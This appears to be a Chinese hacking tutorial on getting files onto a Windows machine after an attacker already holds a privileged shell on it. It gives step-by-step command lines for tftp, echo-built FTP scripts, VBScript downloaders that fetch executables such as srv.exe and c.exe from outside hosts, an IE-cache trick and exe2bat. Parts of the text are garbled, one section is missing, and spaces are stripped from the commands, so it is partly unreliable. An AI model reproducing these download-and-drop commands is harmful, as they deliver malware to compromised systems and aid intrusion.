本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.
一,TFTP
格式:tftp-igetfile.exepath/file.exe默认存放在system32下,如果指定就存在指定的地方。
二:ftp下载文件
ftp下载文件一般步骤如下:
echoopenxxx.xxx.xxx.xxx〉ftp.txt
echouser〉〉ftp.txt
echopassword〉〉ftp.txt
echobinary〉〉ftp.txt[可选]
echogetsrv.exe〉〉ftp.txt
echobye〉〉ftp.txt
ftp-s:ftp.txt(这一步是关键哟)
delftp.txt
这样srv.exe文件拖略谙吕戳恕1Vrv.exe已经存在指定位置。
四:写程序下载
脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序实例的简化:
echoSetxPost=CreateObject("Microsoft.XMLHTTP")〉webdown.vbs
echoxPost.Open"GET","http://txhak.126.com/srv.exe",0〉〉webdown.vbs
echoxPost.Send()〉〉webdown.vbs
echoSetsGet=CreateObject("ADODB.Stream")〉〉webdown.vbs
echosGet.Mode=3〉〉webdown.vbs
echosGet.Type=1〉〉webdown.vbs
echosGet.Open()〉〉webdown.vbs
echosGet.Write(xPost.responseBody)〉〉webdown.vbs
echosGet.SaveToFile"srv.exe",2〉〉webdown.vbs
然后执行cscriptwebdown.vbs就可以啦。其中,http://txhak.126.com/srv.exe改成你放文件的网站路径,srv.exe可以改成保存文件的路径。这里ADODB.Stream很重要如果目标机隔离了adodb.stream就会不成功。
五:STARTITS:HTTP://IP/文件名
然后cd"C:\DocumentsandSettings\DefaultUser\LocalSettings\TemporaryInternetFiles\Content.IE5\"
然后DIR文件名[1]
注意:那串长文件名要用""引起来,因为有空格
例子:C:\DocumentsandSettings\Administrator〉startits:http://xxx.xxx.xxx.xxx/srv.
C:\DocumentsandSettings\Administrator\LocalSettings\TemporaryInternetFiles\Content.IE5\0AB3MNO1的目录
2003-11-2217:4812,832srv[1].exe
1个文件12,832字节
列出所有文件:
1个文件12,832字节
0个目录6,425,985,024可用字节
C:\DocumentsandSettings\Administrator〉copyC:\DocumentsandSettings\Administrator\LocalSettings\TemporaryInternetFiles\Content.IE5\0AB3MNO1\srv[1].exec:\srv.exe
已复制1个文件
六。一句话下载。第4种方法的精简,有时很有用的
echoSetxPost=CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():SetsGet=CreateObject(^"ADODB.Stream^"):sGet.Mode=3:sGet.Type=1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile^"c:\c.exe^",2〉pig.vbs
七。写程序下载
echoiLocal=LCase(WScript.Arguments(1))〉c:\down.vbs
echoiRemote=LCase(WScript.Arguments(0))〉〉c:\down.vbs
echoSetxPost=CreateObject("Microsoft.XMLHTTP")〉〉c:\down.vbs
echoxPost.Open"GET",iRemote,0〉〉c:\down.vbs
echoxPost.Send()〉〉c:\down.vbs
echoSetsGet=CreateObject("ADODB.Stream")〉〉c:\down.vbs
echosGet.Mode=3〉〉c:\down.vbs
echosGet.Type=1〉〉c:\down.vbs
echosGet.Open()〉〉c:\down.vbs
echosGet.Write(xPost.responseBody)〉〉c:\down.vbs
echosGet.SaveToFileiLocal,2〉〉c:\down.vbs
八.exe2bat命令行下输入,debug还原成文件
用exe2bat这个工具把exe文件转化成bat,然后一行行敲进去,这样工作量非常大,只适合于非常短小的文件
